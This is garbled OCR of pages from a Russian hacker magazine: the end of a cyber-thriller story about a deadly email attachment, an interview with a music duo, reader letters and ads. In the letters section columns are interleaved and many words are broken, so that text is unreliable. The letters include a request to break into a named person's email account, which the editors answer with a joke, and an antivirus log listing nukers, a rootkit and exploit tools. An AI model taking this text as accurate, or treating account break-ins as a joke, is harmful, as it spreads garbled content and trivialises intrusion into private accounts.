ма убил его наповал. Кибер-секс... Элитные 
проститутки... Дик - человек с гениальными 
способностями и страшными желаниями... 

«Мужчина, взгляд которого запал мне в ду- 
шу» - прошептал он строки из письма. И 
вновь перед ним встала Катя Беляева в розо- 
вом пеньюаре, женщина с именем жены Гит- 
лера, сводившая с ума при помощи... Даже 
сложно сказать, при помощи чего. 

- Но меня ты свела с ума безо всяких Барби, 
- сказал Антон сам себе. 

Он протер глаза ладонями и задумался. По- 
том вызвал такси, поехал в сервис-центр, ска- 
чал семисотметровый аттач, приделал к нему 
автостарт и переслал его Дику. А выполнив 
задуманное, купил большой букет роз, бутыл- 
ку шампанского и поехал к ней домой. 
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- «..Я уверена, что ты не пожалеешь ни вре- 
мени, ни денег и получишь этот файл. Успе- 
хов тебе, Дик. Помни о нас» - человек за 
компьютером, словно сошедший с фотогра- 
фии на стене в квартире Евы, закончил чте- 
ние первого письма и взглянул на второе, со- 
держащее вложение в семьсот мегабайт с 
хвостиком. 

Откинувшись в кресле, он понимающе пока- 
чал головой и улыбнулся. 

- Это Марго нашла меня, - сказал он сам се- 
бе. - Она всегда была лучшей во всем, неда- 
ром ведь собиралась поступать куда-то на ин- 
форматику... «Помни о нас». Я всегда помню 
моих девочек... Клео, Жасмин, Ева - я приду- 
мывал такие имена, чтобы секс с вами казал- 
ся моим клиентам экзотикой. На это они обыч- 
HO и клевали, недаром процент возвращения 
ко мне и к вам был необычайно высок - еди- 
ножды испытав на себе ваши прелести и лас- 
ки, девять из десяти хотели вас снова... Конеч- 
но же, я получу этот файл. Меня не покидает 
надежда создать еще одну такую... Барби. 

По выделенному каналу файл перетекал с 
огромной скоростью, через несколько минут 
Дик отключился от Сети, выбрал письмо с 
вложением и взглянул на него. Из маленькой 
скрепки в углу, символизирующей файл, выс- 
кочил прямоугольничек с красными буквами. 

«Щелкни по мне», - удивленно прочитал 
Дик и машинально нажал кнопку «мыши». На 
экране медленно проступила фотография 
красивой полуобнаженной женщины в сексу- 
альном черном кружевном белье. А еще че- 
рез секунду она рассыпалась на миллионы 
вращающихся точек, на бесконечно изменяю- 
щийся 301... 

Дик застыл, зомбированный этим танцем 
взорвавшейся красавицы. Его начало понем- 
ногу трясти, на лице появилось некое подо- 
бие блаженной улыбки. Рука отпустила 
«мышку»; пальцы попытались расстегнуть 
«молнию» на джинсах - не получилось, но, 
как оказалось, это было и не нужно. Глаза 
были прикованы к экрану, дыхание стало час- 
тым, поверхностным, крылья носа затрепета- 
ли - часто, как мотылек. Спустя минуту его 
настиг мощный оргазм, спровоцированный 
самораспаковавшимся файлом Евы Браун; 
внезапно он захрипел и обмяк в кресле. Пра- 
вый глаз налился красным, угол рта повис, 
как парус в безветренную погоду; изо рта не- 
контролируемо потекла слюна. 

Дик около минуты медленно сползал с 
кресла, потом вся правая половина тела, от- 
казавшая в результате кровоизлияния в мозг, 
потянула его камнем к полу. Он упал рядом с 
компьютером лицом в ковер; через несколь- 
ко часов внутричерепная гематома убила его 
совсем. На экране медленно растаяла краса- 
вица в черном белье... 


жжх 


Конечно же, она впустила его. Они выпили 
шампанское, потом она ушла в ванну Евой 
Браун, а вышла оттуда Катей Беляевой. 

Пока она подставляла свое красивое те- 
ло струям прохладной воды, Антон осто- 
рожно снял со стены фотографию Дика и 
опустил на пол. 

А потом было МОРЕ ЛЮБВИ... 


В ПРОДАЖЕ С 22 ИЮЛЯ 
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в номере. 


«Акелла» создала впечатляющий проект по 
голливудскому блокбастеру с многомиллионным 
бюджетом. Некогда «Корсары Il», а теперь 
«Пираты Карибского моря — Корсары П». 
Встречайте! 


Долгожданное продолжение эпической саги. 
Читайте обширный материал о Warcraft Ill: The 
Frozen Throne от нашего спецкора, общающегося 
со злобным Иллиданом исключительно на «ты». 


Наши редакторы поссорились из-за финальной 
оценки противоречивой Silent НИ 3. 
Рассудит их только дуэль. 


EyeToy: Play — диск с мини-играми для цифровой 
камеры, подключающейся к вашей PlayStation 2! 


Читайте о самом мощном приставочном 
аксессуаре из тех, что нам доводилось видеть. 
Steel Battalion (Xbox) с его неимоверно крутым 
контроллером и ценовым ярлычком в $300 
предназначен только для самых хардкорных из 
хардкорных игроков. 


В силу своей гениальности в Ritual не умеют 
разочаровывать. Star Trek: Elite Force Il — 
очередное тому подтверждение. 


Пираты Карибского моря — Корсары И ® Warcraft III: 
The Frozen Throne ® Star Trek: Elite Force || ® Silent 
Hill 3 ® Wrath Unleashed ® Midnight Club II ® Порт 
Роял (Port Royale) ® Def Jam Vendetta ® The Elder 
Scrolls III: Bloodmoon ® Galactic Civilizations ® 
EyeToy: Play ® Антанта ® Повелитель ужаса (Ghost 
Master) ¢ Robocop 
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RELAX/DJ TALK 


SuperCasanovas: 


ERIC BONERZ И THE MILLIONAIRE 


nOah (noah@real.xakep.ru) 


едавно в Москву приезжали двое прикольных чуваков, называ- 
ющих себя SuperCasanova. Это Eric Bonerz и The Millionaire. 
Этих ребят называют гуру музыкального программирования, 
поэтому то мы и решили взять у них интервью. Что касается му- 
зыки, которую они играют, то ты сможешь ее себе представить, 
если слышал о проекте Combustible Edison (The Millionaire, кста- 
ти, является одним из его участников). 
Как оказалось, ребята не просто прикольные, а просто экстремально при- 
кольные! Eric Bonerz и The Millionaire ругались между собой все интервью, 
перебивали друг друга и вообще оттягивались, как только могли. Задав пер- 
вый же вопрос на тему компов, я получил такой флейм информации, что это 
отбило у меня всякую охоту вообще во что-либо вникать :). Читай и наслаж- 


дайся - они действительно прикольные. 


Спец: Привет! Это журнал Хакер. Я 
буду задавать всякие компьютерные 
вопросы, не пугайтесь, ок? 

The Millionaire: Ок, начинай! 

Eric Bonerz: Да, мы готовы. 


Спец: Ребята, я слышал, что при 
создании музыки вы используете ка- 
кой-то суперкомпьютер, мейнфрейм. 
Это правда? Что это за штука? 

The Millionaire: Да это так. Этот су- 
перкомпьютер спроектировали какие- 
то военные ученые. Я не шибко раз- 
бираюсь во всех этих делах и не могу 
точно сказать, что там внутри... - нет, я 
использую компьютер каждый день, 
но... Короче, он очень функциональ- 
ный. На нем используется специаль- 
ная оперативная система - я, честно 
говоря точно не помню, как она назы- 
вается, но она очень удобная, потря- 
сающе удобная. 

Eric Bonerz: Да, это крутая машина. 
Ее обслуживают специальные люди. 
там все очень секретно. Например, 
нельзя входить в комнату, где эта ма- 
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шина стоит - ты не сможешь ее даже 
увидеть. Мы особо не лезем. То есть 
мы просто заходим туда, делаем то, 
что нам надо и все. Никуда не лезем. 
Когда что-то не ладиться, приходят 
некие чуваки. Очень стильные, и что- 
то делают. Мы толком не понимаем, 
что, но выглядят они очень здорово. 

The Millionaire: У этих ребят пара- 
нойя по поводу индустриального са- 
ботажа! 

С: А эта штука подключена к инету? 

ТМ: Нет! 

ЕВ: Нет-нет-нет! (перебивая друг 
друга) 

ТМ: Нет, он полностью отдельный, он 
один такой и ни к чему не подключен. 


С: Ага, боитесь хакеров? 

ТМ: Да, определенно боимся. 

ЕВ: Интернет... Я юзаю его на своем 
домашнем компе, без проблем! Я 
имею в виду, мы любим Интернет. 

ТМ: Ага, Интернет мы любим, это 
очень удобная штука и все такое. 
Можно что-то всегда послать, полу- 


чить, найти. Но со всеми этими удоб- 
ствами Интернет приносить еще и 
большую опасность. Мне кажется эти 
ребята, которые обслуживают наш 
мейнфрейм, они боятся, что что-то 
попортит наши файлы, какой-нибудь 
вирус или что-то типа того. 

ЕВ: Короче, да, мы юзаем Интернет. 
Но не на нашем мейнфреме. На дру- 
гих компьютерах. 


С: Приходилось когда-нибудь об- 
щаться с какими-нибудь хакерами? 

ЕВ: Дааа, блиииин, черт его знает... 
Наверное, нет. 


С: Хм, какую операционку исполь- 
зуете дома? 

ЕВ: Дома - Мас. 

ТМ: Я тоже Мас. 


С: Оба Мас? А че так? 

ЕВ: Да он очень простой, вот и все. 
Потом на РС ты не сможешь делать 
музыку. 

ТМ: Под мак есть огромное количе- 
ство музыкального софта. 


С: Уфф, ребята, давайте больше не 
будем о компьютерах, а? Скажите 
лучше, как вам фильмы Квентина 
Тарантино? 

ЕВ: Ммм.., он (показывает Ha The 
Millionaire) делал музыку для одного 
из этих фильмов. 

С: Ага, я знаю - "Четыре комнаты". 

ТМ: О, мне очень понравилось! Очень 
стильно! Вообще все эти здоровые хму- 
рые парни с пушками - это клево. Парень 
(Тарантино) реально поднял стиль. 

ЕВ: Я вообще считаю, что он делает 
очень хорошие фильмы. Правильное 
кино. 


С: Ладно, отвлеклись на секунду, 
теперь обратно к компьютерам. Мой 
следующий вопрос... 

ТМ: А это что, какой-то компьютер- 
ный журнал что ли? 

С: Ну да! Это журнал Хакер, я же 
сказал в самом начале! В этом то все 
и дело! 


ТМ: О, черт! Хакер. Точно! Извини, я 
забыл, запутался, пока отвечал на 
твои вопросы - так много интервью 
сегодня... 


С: Да ничего, все нормально. Итак, 
парни, вы играете в компьютерные 
игры? 

ЕВ: Я играю! Ты имеешь в виду ви- 
деоигры, правильно? 

С: Ага. 

ТМ: А я не играю. Мне кажется, все 
игры сейчас не интересные. Ну, это 
же просто тупое нажимание кнопок! 
Я буду играть в компьютерные игры, 
когда они станут действительно инте- 
ресными, захватывающими. Чтоб те- 
бе приходилось шевелить задницей, 
а не пальцами. 

ЕВ: Фигня! У меня есть Play Station 
2, ия с удовольствием в нее играю. 
Мне вообще нравятся китайские иг- 
рушки и китайская музыка. Я просто 
сажусь и получаю удовольствие - 
называй это, как хочешь, шевелени- 
ем пальчиками или как угодно еще. 
А какая самая популярная пристав- 
ка здесь? 


С: Я не уверен, но, наверное, Xbox... 
Эрик, а ты пробовал GTA: Vice City? 

ЕВ: О, да! Один мой очень хороший 
друг работает в этой компании, 
Rockstar Games. Прикольная игруш- 
ка. Настоящий компьютерный вирус, 


я бы сказал. Отнимает кучу времени. 
И очень стильная при этом. 

С: Я потому и спросил, что вы, ре- 
бята, прямо как два персонажа из 
этой игры. 

ЕВ: Ха, точно! Но игра действитель- 
но крутая, прямо все ощущения, как 
будто ты едешь на тачке, а когда вре- 
заешься в кого-нибудь... - я не знаю, 
какие там должны быть ощущения, 
но я делаю так: "Вааааау!". 

ТМ: А я все жду, пока появится насто- 
ящая виртуальная реальность. Когда 
все сенсорные функции будут включе- 
ны, не только изображение и звук, как 
сейчас. Чтоб можно было унюхать, по- 
чувствовать... Или лучше чтоб вообще 
все попадало прямо тебе в мозг! Вот 
это действительно круто... 

ЕВ: Не будет такого! 

ТМ: Через пять лет! Я уверен, что 
все это появится через пять лет! 

ЕВ: Нет! Ты что, думаешь, что все 
будет как в Star Trek? Боюсь, He дож- 
дешься. 

ТМ: Не совсем, но примерно так. Все 


что предсказала научная фантасти- 
ка, почти все свершилось! 

ЕВ: Короче, мне кажется, что вирту- 
альная реальность - фигня. Так и на- 
пиши, напиши, что ее не будет. 

ТМ: Тогда напиши, что я с этим не 
согласен! 


смог бы. 

ЕВ: Не думаю. 

ТМ: А откуда тебе знать? (спокойно 
так, посмотрев прямо в глаза Эрику - 
пауза, потом все смеются). 


С: Назовите свои любимые тачки. 
ЕВ: Мне нравится Lamborgini Diablo 


С: Ок, ок, ребята! Напишем и то, и 
другое, не вопрос. Только не ссорь- 
тесь (все смеются). 

Я так понял, вы тащитесь от кибер- 
панка, так? 

ТМ: Мне нравится, но, честно говоря, 
концепт немного мрачноватый: люди 
уничтожат сами себя, огромные кор- 
порации завладеют миром и все та- 
кое... А вообще книжки интересные. 

ЕВ: Ты читал Гибсона? 

ТМ: Да, в том числе и его. Он - отец 
жанра. 

С: А я читаю книжки Гибсона пря- 
мо с этой штуки (показываю им 
КПК). Очень удобно, кстати. 

Ок, поехали дальше: если бы вам 
предложили вживить такой чип, 
чтоб вы могли делать что-нибудь не- 
обычное, что бы вы выбрали? 

ТМ: Я выбрал бы невидимость. Это 
действительно то, что я хочу. 

ЕВ: А я попросил бы, чтоб мне в па- 
лец вживили кредитную карточку. 
Обычную кредитку, но чтоб в пальце - 
всегда с собой, никогда не потеряешь. 


С: Не знаю, как вам такой вопрос, но 
я его все-таки задам: если бы у вас 
был шанс, грохнуть какого-нибудь чу- 
вака, но без всяких последствий для 
себя и без всяких проблем с законом, 
воспользовались бы им? 

ЕВ: Нет. 

ТМ: Знаешь, некоторых чуваков я 
готов грохнуть даже с учетом всех 
последствий и проблем с законом! 

ЕВ: Ты смог бы убить человека? 

ТМ: Да, иногда мне кажется, что 


VT. Она просто невероятная! 

ТМ: Мой любимый автомобиль - 
Buick Rivera 1972 года выпуска. Вели- 
колепная спортивная тачка с самым 
большим двиглом, когда-либо уста- 
новленным в машину. 


С: Как вы думаете, ребята, челове- 
чество построит когда-нибудь коло- 
нию на Марсе? 

ЕВ: Неа, вряд ли. 

ТМ: Построит-построит! Это будет 
самый элитный район, потому что 
близко к Земле. Я надеюсь, люди не 
загадят Марс так же, как Землю. 

ЕВ: Ну вот опять, он меня совсем не 
слушает! Облажал все интервью, пе- 
речит мне по каждому вопросу! 


С: А какое самое лучше место для 
вас на Земле? 

ТМ: Вообще-то, если учесть, что мы 
выбрали Лос-Анджелес, то это они 
есть. Но там много как плюсов, так и 
минусов. Очень специфическое мес- 
то. А еще мне нравится Луизиана. 
Это одно из самых опасных мест в 
Америке, но я там себя отлично 
чувствую. 

ЕВ: Я люблю Францию. Но я бы не 
стал жить там. Во Франции клево от- 
дыхать, гулять. 


С: Ок. Это все мои вопросы. Спаси- 
бо, ребята, вам за интервью! 

ТМ: Удачи! 

ЕВ: Да, очень весело пообщались. 
Пока! 
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ОСи 4work 


Хей!!! 
Не буду растекаться мыслию по древу о том, что вы супер-пупер бла-бла-бла- 
бла-бла-бла-бла-бла-бла-бла-бла, а перейду к делу 
во-первых, вам следовало назвать эту серию Спецов не ОСи, а софт 
4use/4xak/4work/ 
во-вторых, мне настолько понравились оса и пингвин с обложек номеров про оси 4иве & 4xak, что я непременно решил за- 
получить их в качестве Обоев на р. Стол, и не могли бы вы их выслать мне на мыло? 
Плиззз!! 

В-третьих, на диске в описаниях к || Хм, я тоже не буду растекаться мышью по href'y, а 
прогам надо обязательно писать, а\Чег@гла ги перейду к делу: серия была названа "ОСи" по ряду 
для каких ОСей они. весьма объективных причин. Все-таки мы не 
Ну, вроде все. просто писали про софт, а сравнивали по разным критериям ВЫНЬ и ЛИНЬ. Причем иногда 
заставляли себя реализовывать совсем абсурдные на первый взгляд идеи. Например, ты 
можешь себе представить офисную сетку на ЛИНЕ? А мы можем! Причем в наш век 
регистраций и активаций такое становится вполне возможным - абсолютно бесплатный и 
рабочий софт вместо дорогого корпоративного. Альтернатива, епрст! По поводу соотнесения 
осей и софта сделал Киру втык, хотя он сопротивлялся и кричал нечленоразборчивые фразы 
типа "чего непонятного, ВинНюк под Линь, что ли?". И последнее... На мыло мы тебе ни хрена 
не выслали... Зато выложили карт на диск :). Забирай и пользуй. С уважением, система 
доставки файлов Дронич-он-деманд. 


Fram: mox_falder@mail.ru 
Subj: Tuna напусать вам 
pewu 


Fram: “AnuTpud Доброе время суток конкретно редакция и в частности все, кто сие прочтет 
- ля начала немного хвалы и критики - дабы знали... 
Анисимов“ Cdmitriy.anisi д д 
moyv@mailru) Спец - вещь хорошая и нужная во всех отношениях... Много мусора (HO куда ж без 
: него - многим он нужен... мне просто - не очень)... HO вообще устраивает как бы все 
ubj: Нннаа... Мое )...Н у 6 
почтенце и вопрос инственное, что убивает - лексикон и форма речи.. 
народ... Ей богу... Ваш журнал же не только 15 летние пацаны читают. Для некото- 
рых (имхо, многих) серьезных людей некоторые номера чуть ли не библией считаются... У меня парочка так прям на самом 
видном месте лежит, дабы часто туда глядеть. А читая: «Ну, перец, щаззз мы с тобой. замут им офигеннейшую хрень - со- 
ри...». Это, конечно, весело, а потому желание как бы работать как бы напрочь отбивает :) 
Ну да то хозяин-барин. Дело-то ваше. 
Собственно вопрос: где бы взять старые но- т 
x os a ee к . Ух, Дмитрий, поднял ты самую тяжелую для нас 
мерки Спеца; Номера с Т по 28-й включи- | ЗОО ИИА том ы находимся в постоянных колебаниях 
тельно??? А??? Ну как бы очень нужно... Для Cdmitriy.anisimov@mailru) у. a 
общего развития | — писать более серьезно или более стебово. На 
В общем, вот. Спасибо за внимание Е ЩИ а ee 
Cua ie HN - “ бовое чтение, наталкивающее на реализацию идей, должно подкрепляться чтением 
м AVA fee мануалов, документаций и HOWTO. Tak что мутить офигеннейшую хрень чисто по 
ре Oren Ga 6 FW ueue-RenGrenee GRE материалам статьи все равно непросто. A вот в случаях, когда мануал недоступен 
| ° в - мы переходим к более серьезному изложению - посмотри, например, статьи Ан 


лизирующего про WSH... А про старые номера ничего хорошего не скажу - нету 
Valerya 
(valerya2003@mail.ru) 


-(. Остались только в электронном виде и в виде больших бумажных архивов у ме 
Помогите взломать ящик : . 
ossamasaad@hotmail.com! DMx (kern@peterlink.ru) 


и Донора... Хотя серия NO взлому регулярно выкладывается на диск, так что може! 
Жду ответа и результата. Е 
Ответ: "Результат: взломали." У меня вопрос: как убрать на фиг 


Но никому ничего не скажем. кнопку Пуск? 
Поставить ЛИНЬ и расслабиться 
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Fram: gar Grigorey Уважаемый, Рубен. 
Cigor énatali299@mail.ru) Хочу сказать несколько слов по поводу выпущенного вами последне- 
Subj: Re: SPNews го спецвыпуска журнала "Хакер", в частности о TOM, что на компакт- 
диске антивирусом (слава богу, что им) мною было обнаружено 42 
вируса. Я просто весь в недоумении. 
Сам журнал очень интересен, но думаю, что в будущем я откажусь от практики приобретать его с диском или вооб- 
ще перес упать, т.к. их обычно продают только с дисками. 
Вот их сп : 
AVP32 пр т 30.06.2003 09:02:04 
E:\soft\buffer\GetAd.exe обнаружен вирус Exploit.Win32.Getad 
E:\soft\buffer\RPCNuke.zip/RPCNuke/Exe/RPCNuke.exe обнаружен вирус Nuker.Win32.RPCNuke 
E:\soft\rootkit\lrk4.shad.tar.gz/Irk4.shad.tar/Irk4/inetd/inetd обнаружен вирус Trojan.Linux.Rootkit.40 
E:\soft\windos\|GMP.exe обнаружен вирус Nuker.Win32.HackNuke. 18 
E:\soft\windos\samnuke.zip/samnuke.exe обнаружен вирус Nuker.Win32.Samnuk 
E:\soft\windos\smbdie.zip/SMBdie.exe обнару- 
жен вирус Nuker.Win32.SmbDie 
E:\soft\windos\voidozer.zip/voidozer.exe обнару- Е у что, господа, все уже отсмеялись? 
жен вирус Nuker.Win32.Voidoze И ees ет? Я подожду... Короче, Игорь-город- 
Е\зой\мипдоз\ иле 2р/мпемк.ехе обнаружен | Беван ермь, мы тут все уже лежим в истерике. 
вирус Nuker.WNewk. 102 о раз ты хочешь размышлений - полу- 
E:\soft\winspoof\expgen085.zip/exploitgenera- | чай. Ради того, чтобы обезопасить ламоботов от пользования всем, что может 
ог.ехе ужен вирус Trojan.Win32.Exploit принчипиально навредить UX компу, дядя Каспер включает в свою базу ВСЕ хаке- 
E:\soft\winspoof\icnewa.zip/icnewa.exe обнару- | рские утилы, которые только может найти. Честно говоря, я слабо себе представ- 
жен вирус Flooder.ICQ.Icnewa.30 ляю человека, который способен запустить нюкер с адресом 127.0.0.1... Хотя нет, 
остатки списка поскипаны Дроничем ради теперь представляю :). Причем вполне четко. Такой чувак из Перми... 
экономии места) Кстати, мы тоже все в недоумении - почему ты перестанешь покупать журнал, если 
Очень бы хотел узнать ваши размышления на | OH будет с диском? То есть без диска он тебе нравится, а с диском - нет? Почему? 


улому UDO 


этот счет. Ладно, оставлю эту загадку на твоей совести. Отдыхай дальше :). 
горь. г. Пермь 


| Fram: Никита Cknikita@pisem.net) Привет, всем спец-хакерам! Вот купил туг недавно ва 
| Subj: про журнал. второй номер с диском (жаль, что первый купить не уда 
| лось) и сразу же начал с интересом изучать его содерж 
мое. Покликав по ссылкам, наткнулся на хак-видео. Инте- 
ресно, но сразу возникает много пожеланий: во первых, сразу возникает ощущение, что видео делалось на ле- 
ту, то есть совсем не продумывались аспекты этого дела. На первых минутах фильма из-за этого получилась не- 
большая пауза. А так хорошо - — - - 
ждем следующих взломов. Se eae eer ee } Hy вот, блин! Наше мега-хак-видео Ha самом де- 
А в целом первый (для меня) диск о: Никита (knikita@pisem.net) | а. р. была р 
получился ничего. Ждем следую- том, чтобы показать вам, как именно надо ло- 
щих выпусков. мать - для этого в номере куча статей с более сложными примерами хака. Это просто атмосфер- 
З.Ы. На лицензионную theBat | ный лог, записанный по приколу посреди ночи :). Причем под довольно позитивную музыку. Ихо- 
не претендую, но хотелось | тя для нас всех этот вид взлома выгладит игрушечным, мы все равно пересматривали этот ро- 
бы увидеть свое письмо лик по пять раз и дико перлись. Перлись от того, что сумели повторить неповторимое - ощущ 
Ha страницах журнала. ния хакера во время взлома. Ну и пусть что игрушечного... :). Кстати, в этом номере все буд 
посерьезнее :). 


acker. 

за ваш журнал! 

авно (почти что с первых номеров). Доволен! Последний номер с CD-best stuff what 
| Вау, софт свежайший (ну почти свежайший), нужный и полезный. А инфы сколько... 
Lac кончу" ("Up In Smoke")! И очень приятно то, что цена не возросла. И за старые HO- 


From: threesnake 
(threesnakes@ukrnet) 
Subj: i_stoned 


мера отдельный сенкс. 
ИМХО #1: Дизайн журнала мне нравится. И прошлый нравился. И позапрошлый... 
В общем, хорошие у Вас дизайнеры/художники и т.п. И если дизайн не менять каждые три-четыре номера, TO они ж без работы ос- 
ганутся. Ау них жены, мужья, дети, собаки, компы неапгрейденные и прочие приблуды, которые требуют денежных вливаний. Ну, мо- 
жет можно им более достойное занятие подыскать, а дизайн пусть под Новый год "автоматический генератор бреда" делает --))))). И 
не чаще, ато в глазах рябит слишком часто. 
ХО #2: НУЖЕН СВОЙ САЙТ!!! Winfo.org, конечно, в Bookmarks'ax есть, HO...(CM. начало абзаца) 
ХО #3: Серии - отличная идея. Иногда в рамках одного номера все потеме не расскажешь, аеще и об остальном сказать надо. Так 
держать за... 


м и a р * |ронич прочел последнее письмо и всплакнул 
ее ene а Ир Be над клавиатурой... Как мы все клево делаем, как 
тся Спецчто? Правильно, ХАКЕР. Акомуне pieced Е: а и Mn ME NM 
neces Kapa, get ou of the Lichen. шем про взлом, какой классный у нас дизайн и 
ХО #5: Все ea CDI И ace рассказы МАО как помогает журналу winfo.org... Но, тем не менее, все это скоро закончится, новые 
й ЕЕ И всему греки и серийни дизайнеры переколбасят макет номера, редакторы отменят серии, авторы начнуг 
7 а = писать на неизвестные нам темы, а ВИНфо Tak и не выйдет из дауна... И Ha этой деп- 
: an a aa и рессивной ноте я хочу сказать одну только фразу - экипаж прошается с вами и жела- 

| ; : ет приятного полета! До встречи на форуме winfo, читатель! 
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И перебров 
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Рисунки и сценарий 
СЕ!Е (grif@real.xakep.ru] 
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Фут FLATRON', | 
freedom of mind : 
Digitally yours 


И все-таки OH вертится! 


FLATIRON" F?00P 


Абсолютно плоский экран 


4 D V; Размер точки 0,24 мм 
2 ‘ ; 7 Частота развертки 95 кГц 
ша ictoria Экранное разрешение 1600x1200 
(095) 252-2030, 252-2070 — 3В-интерфейс 


г.Москва: Атлантик Компьютерс (095) 240-2097; Банкос (095) 128-9022; Березка (095) 362-7840; ДЕЛ (095) 250-5536; Инкотрейд (095) 176-2873; Инфорсер (095) 747-3178; 
КИТ-компьютер (095) 777-6655; Компьютеры и офис (095) 918-1117; Компьютерный салон SMS (095) 956-1225; ЛИНК и К (095) 784-6618; НИКС (095) 974-3333; 
Сетевая Лаборатория (095) 784-6490; СКИД (095) 956-8426; Техмаркет Компьютерс (095) 363-9333; Ф-Центр (095) 472-6401; Flake (095) 236-9925; ISM Computers (095) 319-8175; 
OLDI (095) 105-0700; POLARIS (095) 755-5557; R-Style (095) 904-1001; г.Архангельск: Северная Корона (8182) 653-525; г.Волгоград: Техком (8442) 975-937; 
г.Воронеж: Сани (0732) 733-222, 742-148; г.Иркутск: Комтек (3952) 258-338; г.Липецк: Регард-тур (0742) 485-285; г.Тюмень: ИНЭКС-Техника (3452) 390-036. 


` 


в 


Фуйкция MagicBright - 
одно прикосновение 


К №. 


Magic Bright 


150 коды? - теюст * 200 кдум? = интернет = 330 кд/м” - игры, фото, DVD. 
Мониторы Samsung SyncMaster 763 МВ, 765 МВ. 757 МВ. 955 МВ. 957 МВ. 


Инфюрмация о магазинах и компаниях, в которых можно приобрести ввониторы, 
ee ee в разделе "Гда купить 


OSs -> ОСИ 4woRK 


